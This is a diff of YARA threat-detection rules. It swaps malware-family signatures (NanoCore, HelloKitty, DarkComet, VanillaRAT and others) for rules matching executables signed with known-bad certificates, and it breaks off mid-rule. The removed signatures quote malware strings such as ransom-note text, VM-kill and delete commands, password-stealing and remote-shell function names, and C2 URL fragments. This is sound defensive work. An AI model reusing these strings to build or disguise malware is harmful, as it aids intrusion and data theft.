 	meta:
-		description = "Detects NanoCore"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "931b98f6-df2b-538b-bc49-ecbbd24334da"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d9271a74-1a04-5863-afc6-4b1d2982f680"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7654-L7681"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2848-L2859"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6336260e0af2b4b51338ee066f41b7c58aa134a6c03ca110db7e088edf2b65a7"
+		logic_hash = "673a275a6d899b5de66d80cb55fa6438c2e14c70a96ba8461eb4946e1f4b4dfa"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "NanoCore Client" fullword ascii
-		$x2 = "NanoCore.ClientPlugin" fullword ascii
-		$x3 = "NanoCore.ClientPluginHost" fullword ascii
-		$i1 = "IClientApp" fullword ascii
-		$i2 = "IClientData" fullword ascii
-		$i3 = "IClientNetwork" fullword ascii
-		$i4 = "IClientAppHost" fullword ascii
-		$i5 = "IClientDataHost" fullword ascii
-		$i6 = "IClientLoggingHost" fullword ascii
-		$i7 = "IClientNetworkHost" fullword ascii
-		$i8 = "IClientUIHost" fullword ascii
-		$i9 = "IClientNameObjectCollection" fullword ascii
-		$i10 = "IClientReadOnlyNameObjectCollection" fullword ascii
-		$s1 = "ClientPlugin" fullword ascii
-		$s2 = "EndPoint" fullword ascii
-		$s3 = "IPAddress" fullword ascii
-		$s4 = "IPEndPoint" fullword ascii
-		$s5 = "IPHostEntr" fullword ascii
-		$s6 = "get_ClientSettings" fullword ascii
-		$s7 = "get_Connected" fullword ascii
+		thumbprint = "9efcf68a289d9186ec17e334205cb644c2b6a147"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 8 of ( $i* ) or all of ( $s* ) or ( 1 of ( $x* ) and ( 3 of ( $i* ) or 2 of ( $s* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bitubit LLC" and pe.signatures [ i ] . serial == "3c:ee:26:c1:25:b8:c1:88:f3:16:c3:fa:78:d9:c2:f1" )
 }
-rule DITEKSHEN_MALWARE_Win_Satan : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_A0A27Aefd067Ac62Ce0247B72Bf33De3 : FILE
 {
 	meta:
-		description = "Detects Satan ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f0a9369e-a3d7-5770-b490-4c9a919abb82"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "1e8db3c4-8d32-5a8d-96ac-785d8f703c7d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7683-L7709"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2861-L2872"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e50daa88e0067a0f00329c6369c0334bd282fb102c91ba5ca770da97851d6d2e"
+		logic_hash = "c49e1d8b1a2d0e27fd25574ce587f60770ecac75c1db437bf7538d2ff47c8d4c"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "S:(ML;;NRNWNX;;;LW)" fullword wide
-		$s2 = "recycle.bin" fullword wide
-		$s3 = "tmp_" fullword wide
-		$s4 = "%s%08x.%s" fullword wide
-		$s5 = "\"%s\" %s" fullword wide
-		$s6 = "/c \"%s\"" fullword wide
-		$s7 = "Global\\" fullword wide
-		$s8 = "rd /S /Q \"%s\"" fullword ascii
-		$s9 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)" fullword ascii
-		$e1 = "*pdf*" fullword wide
-		$e2 = "*rtf*" fullword wide
-		$e3 = "*doc*" fullword wide
-		$e4 = "*docx*" fullword wide
-		$e5 = "*xlsx*" fullword wide
-		$e6 = "*pptx*" fullword wide
-		$e7 = "*moneywell*" fullword wide
-		$o1 = { 56 8d 54 24 34 b9 9e f0 ea be e8 c1 f9 ff ff 8d }
-		$o2 = { b9 34 f6 40 00 e8 ea 0b 00 00 85 c0 0f 84 91 }
-		$o3 = { 53 8d 84 24 34 01 00 00 b9 01 00 00 80 50 a1 64 }
+		thumbprint = "42c2842fa674fdca14c9786aaec0c3078a4f1755"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 8 of ( $s* ) and 4 of ( $e* ) ) or all of ( $s* ) or ( all of ( $e* ) and 5 of ( $s* ) ) or ( all of ( $o* ) and 8 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cfbcdabfdbdccaaccadfeaacacf" and pe.signatures [ i ] . serial == "a0:a2:7a:ef:d0:67:ac:62:ce:02:47:b7:2b:f3:3d:e3" )
 }
-rule DITEKSHEN_MALWARE_Win_Neshta : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Eee8Cf0A0E4C78Faa03D07470161A90E : FILE
 {
 	meta:
-		description = "Detects Neshta"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b96ee19e-b631-57fd-bf8a-67d790202c46"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "a91c84db-99b4-5e24-ba8a-4e009219eb05"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7711-L7720"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2874-L2885"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7967c1154f652e28e541058a7b7f61aa077cfaf6be58282e1de68d9a6088c1ac"
+		logic_hash = "5c14eeeab8cf9797499d23f451a695b443ecc8d3ebbc2edb830ae450e444178c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus." fullword ascii
-		$s2 = "! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]" fullword ascii
+		thumbprint = "32eda5261359e76a4e66da1ba82db7b7a48295d2"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aafabffdbdbcbfcaebdf" and pe.signatures [ i ] . serial == "ee:e8:cf:0a:0e:4c:78:fa:a0:3d:07:47:01:61:a9:0e" )
 }
-rule DITEKSHEN_MALWARE_Linux_Hellokitty : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_79E1Cc0F6722E1A2C4647C21023Ca4Ee : FILE
 {
 	meta:
-		description = "Detects Linux version of HelloKitty ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "bb228937-8cd8-5fb8-aaed-3bd539ae96f2"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "0abbd882-0224-5c94-98b2-870853344883"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7722-L7746"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2887-L2898"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bcb1188d616b29fa535e757a37476435a3061d27e143339413f6829876701868"
+		logic_hash = "9d0c02ae3eab7f7c28dba04cd08fdddef2be64a1622d7fb519a4bf3a40ef19b1"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "exec_pipe:%s" ascii
-		$s2 = "Error InitAPI !!!" fullword ascii
-		$s3 = "No Files Found !!!" fullword ascii
-		$s4 = "Error open log File:%s" fullword ascii
-		$s5 = "%ld - Files Found  " fullword ascii
-		$s6 = "Total VM run on host:" fullword ascii
-		$s7 = "error:%d open:%s" fullword ascii
-		$s8 = "work.log" fullword ascii
-		$s9 = "esxcli vm process kill" ascii
-		$s10 = "readdir64" fullword ascii
-		$s11 = "%s_%d.block" fullword ascii
-		$s12 = "EVP_EncryptFinal_ex" fullword ascii
-		$s13 = ".README_TO_RESTORE" fullword ascii
-		$m1 = "COMPROMISED AND YOUR SENSITIVE PRIVATE INFORMATION WAS STOLEN" ascii nocase
-		$m2 = "damage them without special software" ascii nocase
-		$m3 = "leaking or being sold" ascii nocase
-		$m4 = "Data will be Published and/or Sold" ascii nocase
+		thumbprint = "41d2f4f810a6edf42b3717cf01d4975476f63cba"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x457f and ( 6 of ( $s* ) or ( 2 of ( $m* ) and 2 of ( $s* ) ) or 8 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPAGETTI LTD" and pe.signatures [ i ] . serial == "79:e1:cc:0f:67:22:e1:a2:c4:64:7c:21:02:3c:a4:ee" )
 }
-rule DITEKSHEN_MALWARE_Win_Blackmatter : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6D688Ecf46286Fe4B6823B91384Eca86 : FILE
 {
 	meta:
-		description = "Detects BlackMatter ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8883e652-edab-5cbf-a4fa-963b437447d9"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "4718996b-cb42-5b83-8fdf-d87751302a00"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7748-L7767"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2900-L2911"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4558002b424f7102f67fc44dfc37ac20f6013e25ae827c6aee0fc37231e2fa72"
+		logic_hash = "33296b5b9156af6d95bec9981a9fab3137bcd17bfb26ea2d212ae004275bf42e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "C:\\Windows\\System32\\*.drv" fullword wide
-		$s2 = "NYbr-Vk@" fullword ascii
-		$s3 = ":7:=:H:Q:W:\\:b:&;O;^;v;" fullword ascii
-		$o1 = { b0 34 aa fe c0 e2 fb b9 03 }
-		$o2 = { fe 00 ff 75 08 ff 75 0c ff b5 d8 fe ff ff ff b5 }
-		$o3 = { 6a 00 ff 75 0c ff b5 d8 fe ff ff ff b5 dc fe ff }
-		$o4 = { ff 75 08 ff 75 0c ff b5 d8 fe ff ff ff b5 dc fe }
-		$o5 = { 53 56 57 8d 85 70 ff ff ff 83 c0 0f 83 e0 f0 89 }
-		$o6 = { c7 85 68 ff ff ff 00 04 00 00 8b 85 6c ff ff ff }
+		thumbprint = "970205140b48d684d0dc737c0fe127460ccfac4f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) and all of ( $o* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AtomPark Software JSC" and pe.signatures [ i ] . serial == "6d:68:8e:cf:46:28:6f:e4:b6:82:3b:91:38:4e:ca:86" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlinjector04 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_9Aa99F1B75A463460D38C4539Fae4F73 : FILE
 {
 	meta:
-		description = "Detects downloader / injector"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "fe423aee-6ff4-5fd0-9fa2-51dd0c27f54b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "5ffad411-49e2-5691-95e7-1e294a2a101e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7769-L7790"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2913-L2924"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ab9a047e53dec2cc5986522636783b5cb8aae7fc0297292d017ec22ee5750cce"
+		logic_hash = "b73c6ca2c0cd0e09f0add77c3af3c8e16f46cec29b49d4dcab5a569fed8d3d39"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Runner" fullword ascii
-		$s2 = "DownloadPayload" fullword ascii
-		$s3 = "RunOnStartup" fullword ascii
-		$a1 = "Antis" fullword ascii
-		$a2 = "antiVM" fullword ascii
-		$a3 = "antiSandbox" fullword ascii
-		$a4 = "antiDebug" fullword ascii
-		$a5 = "antiEmulator" fullword ascii
-		$a6 = "enablePersistence" fullword ascii
-		$a7 = "enableFakeError" fullword ascii
-		$a8 = "DetectVirtualMachine" fullword ascii
-		$a9 = "DetectSandboxie" fullword ascii
-		$a10 = "DetectDebugger" fullword ascii
-		$a11 = "CheckEmulator" fullword ascii
+		thumbprint = "b2ea9e771631f95a927c29b044284ef4f84a2069"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 5 of ( $a* ) ) or 10 of ( $a* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beaacdfaeeccbbedadcb" and pe.signatures [ i ] . serial == "9a:a9:9f:1b:75:a4:63:46:0d:38:c4:53:9f:ae:4f:73" )
 }
-rule DITEKSHEN_MALWARE_Win_Darkcomet : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_E414655F025399Cca4D7225D89689A04 : FILE
 {
 	meta:
-		description = "Detects DarkComet"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ae2412df-adae-5640-9404-7b093c5095b4"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2df4eb66-4890-540f-95e1-fb69eeb32df2"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7792-L7812"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2926-L2937"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "444df3c914c47500018614af10036864b459e7873daf079b684352dbe52f0486"
+		logic_hash = "589ad4939d235138791a98f5d43f6a786ad14345c995ad2e073d3673fb41365a"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "%s, ClassID: %s" ascii
-		$s2 = "%s, ProgID: \"%s\"" ascii
-		$s3 = "#KCMDDC51#" ascii
-		$s4 = "#BOT#VisitUrl" ascii
-		$s5 = "#BOT#OpenUrl" ascii
-		$s6 = "#BOT#Ping" ascii
-		$s7 = "#BOT#RunPrompt" ascii
-		$s8 = "#BOT#CloseServer" ascii
-		$s9 = "#BOT#SvrUninstall" ascii
-		$s10 = "#BOT#URLUpdate" ascii
-		$s11 = "#BOT#URLDownload" ascii
-		$s12 = /BTRESULT(Close|Download|HTTP|Mass|Open|Ping\|Respond|Run|Syn|UDP|Uninstall\|uninstall|Update|Visit)/ ascii
-		$s13 = "dclogs\\" fullword ascii
+		thumbprint = "98643cef3dc22d0cc730be710c5a30ae25d226c1"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\xAF\\x94\\xE5\\x90\\xBE\\xE8\\xBF\\xAA\\xE5\\x90\\xBE\\xE8\\xBF\\xAA\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE8\\xBF\\xAA\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE6\\x8F\\x90\\xE4\\xBC\\x8A\\xE6\\xAF\\x94\\xE6\\x8F\\x90\\xE8\\xBF\\xAA\\xE8\\xBF\\xAA\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE6\\x8F\\x90\\xE7\\xBB\\xB4\\xE6\\xAF\\x94" and pe.signatures [ i ] . serial == "e4:14:65:5f:02:53:99:cc:a4:d7:22:5d:89:68:9a:04" )
 }
-rule DITEKSHEN_MALWARE_Win_Macoute : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_64F82Ed8A90F92A940Be2Bb90Fbf6F48 : FILE
 {
 	meta:
-		description = "Detects Macoute"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0ecfb923-2e51-544e-984d-efdeeb175727"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "70469507-30f1-56be-90bb-1055f7df2496"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7814-L7836"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2939-L2950"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1dffa48fe6c0ac053509b5f5994d323fd72d090da0f077b52c9bc33df6997964"
+		logic_hash = "eacb9d8834bdf618b5aa44bfb37b0b6413f9b4595b6261a948566a63e9855162"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "scp%s%s%s%s" ascii
-		$s2 = "putfile %s %s" ascii
-		$s3 = "pscp|%s|%s:%s" ascii
-		$s4 = "connect %host %port\\n" ascii
-		$s5 = "/ecoute/spool/%s-%lu" ascii
-		$s6 = "<f n=\"%s\" s=\"%lu\" d=\"%d-%d-%d\"/>" ascii
-		$s7 = "CMPT;%s;%s;%s;%s;%s" ascii
-		$s8 = "%s\\apoScreen%lu.dll" ascii
-		$s9 = "/cap/%s%lu.jpg" ascii
-		$s10 = "INFO;%u;%u;%u;%d;%d;%d;%d;%d;%d;%d;%s" ascii
-		$s11 = "SUBJECT: %s is comming!" ascii
-		$s12 = "Content-type: multipart/mixed; boundary=\"#BOUNDARY#\"" ascii
-		$s13 = "FROM: %s@yahoo.com" ascii
-		$s14 = "<html><script language=\"JavaScript\">window.open(\"readme.eml\", null,\"resizable=no,top=6000,left=6000\")</script></html>" ascii
-		$s15 = "<html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>" ascii
+		thumbprint = "4d00f5112caf80615852ffe1f4ee72277ed781c3"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 10 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Klimate Vision Plus" and pe.signatures [ i ] . serial == "64:f8:2e:d8:a9:0f:92:a9:40:be:2b:b9:0f:bf:6f:48" )
 }
-rule DITEKSHEN_MALWARE_Win_Coinminer04 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00F0031491B673Ecdf533D4Ebe4B54697F : FILE
 {
 	meta:
-		description = "Detects coinmining malware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d90d8ad3-20b7-5bb4-8c58-3488c60ed9a2"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "ad027dc9-14bc-50dd-b260-7672c528ef9a"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7838-L7858"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2952-L2963"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2ef60dbf0bac3d5910635bb011a45e5ebc1392094b10425604fa9dd290198f8b"
+		logic_hash = "4697ce0a7fcd1fa6ac1dd5246f2a23b85865bef4010280c4ca2e12c433b8ceb2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "createDll" fullword ascii
-		$s2 = "getTasks" fullword ascii
-		$s3 = "SetStartup" fullword ascii
-		$s4 = "loadUrl" fullword ascii
-		$s5 = "Processer" fullword ascii
-		$s6 = "checkProcess" fullword ascii
-		$s7 = "runProcess" fullword ascii
-		$s8 = "createDir" fullword ascii
-		$cnc1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0" fullword wide
-		$cnc2 = "?hwid=" fullword wide
-		$cnc3 = "?timeout=1" fullword wide
-		$cnc4 = "&completed=" fullword wide
-		$cnc5 = "/cmd.php" wide
+		thumbprint = "01e201cce1024237978baccf5b124261aa5edb01"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) and 1 of ( $cnc* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eebbffbceacddbfaeefaecdbaf" and pe.signatures [ i ] . serial == "00:f0:03:14:91:b6:73:ec:df:53:3d:4e:be:4b:54:69:7f" )
 }
-rule DITEKSHEN_MALWARE_Win_Sidewalk : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Becd4Ef55Ced54E5Bcde595D872Ae7Eb : FILE
 {
 	meta:
-		description = "Detects SideWalk"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ab82b83a-a279-555a-83c2-6340431b10da"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "85835042-a4ab-5cb2-963d-4ef776b740d1"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7860-L7880"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2965-L2976"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6885a1ad69d61fa5875ee0db949071e84390fc2db4307c412b32cd17c0806f6a"
+		logic_hash = "b573853cfb28bdbda37c929834faa15475707684edfe99f14174599faf7b4fb6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Decommit" fullword ascii
-		$s2 = "Shellc0deRunner" fullword ascii
-		$s3 = "shellc0de" fullword ascii
-		$s4 = "C:\\Windows\\System32\\msdt.exe" fullword wide
-		$s5 = "StartProcessWOPid" fullword ascii
-		$s6 = "StartProcessWithParent" fullword ascii
-		$m1 = "alloctype" fullword ascii
-		$m2 = "ThreadIoPriority" fullword ascii
-		$m3 = "PebAddress" fullword ascii
-		$m4 = "dotnet.4.x64.dll" fullword wide
-		$m5 = "LogonNetCredentialsOnly" fullword ascii
-		$m6 = "ThreadIdealProcessor" fullword ascii
-		$m7 = "LogonWithProfile" fullword ascii
+		thumbprint = "72ae9b9a32b4c16b5a94e2b4587bc51a91b27052"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or all of ( $m* ) or ( 11 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dedbfdefcac" and pe.signatures [ i ] . serial == "be:cd:4e:f5:5c:ed:54:e5:bc:de:59:5d:87:2a:e7:eb" )
 }
-rule DITEKSHEN_MALWARE_Win_Vanillarat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_55B5E1Cf84A89C4E023399784B42A268 : FILE
 {
 	meta:
-		description = "Detects VanillaRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "70c2cd1a-a6d4-562e-a6fc-c16a9e87c6b7"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "de2890d4-3758-5e90-a9af-dc519f0b9e4c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7882-L7902"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2978-L2989"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d7b90ac88a50693ec4bb0676c04f5d161f04f67970ea60d80e79d774da75bfdc"
+		logic_hash = "37f08db5373cf46da7c0a4a03af21559fdcddb2481f935d5cece55a1fb4abc3c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$stub = "VanillaStub." ascii wide
-		$s1 = "Client.Send: " wide
-		$s2 = "Connected to chat" fullword wide
-		$s3 = "GetStoredPasswords" fullword wide
-		$s4 = "Started screen locker." fullword wide
-		$s5 = "[<\\MOUSE>]" fullword wide
-		$s6 = "YOUR SCREEN HAS BEEN LOCKED!" fullword wide
-		$s7 = "record recsound" fullword wide
-		$f1 = "<StartRemoteDestkop>d__" ascii
-		$f2 = "<ConnectLoop>d__" ascii
-		$f3 = "<Scan0>k__" ascii
-		$f4 = "<RemoteShellActive>k__" ascii
-		$f5 = "KillClient" fullword ascii
+		thumbprint = "940345ed6266b67a768296ad49e51bbaa6ee8e97"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( $stub and ( 2 of ( $s* ) or 2 of ( $f* ) ) ) or 6 of ( $s* ) or all of ( $f* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fbbdefaccbbcdc" and pe.signatures [ i ] . serial == "55:b5:e1:cf:84:a8:9c:4e:02:33:99:78:4b:42:a2:68" )
 }
-rule DITEKSHEN_MALWARE_Win_Sectoprat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_84C3A47B739F1835D35B755D1E6741B5 : FILE
 {
 	meta:
-		description = "Detects SectopRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d6594834-24d7-5e86-84b5-5a7920e7bc89"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "00fba5a5-b87d-54f7-a5b8-f7b377af2202"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7904-L7929"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2991-L3002"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b4048f837c02560a8b650247173be25893b466e5cec8f2784eea58172f973822"
+		logic_hash = "6beb0966f2ed981c2e1a859ff9f659a566de867888123c387eeb89a97620345e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\\\.\\root\\cimv2:Win32_Process" wide
-		$s2 = "\\\\.\\root\\cimv2:CIM_DataFile.Name=" wide
-		$s3 = "^.*(?=Windows)" fullword wide
-		$s4 = "C:\\Windows\\System32\\cmd.exe" wide
-		$s5 = "C:\\Windows\\explorer.exe" wide
-		$s6 = "Disabling IE protection" wide
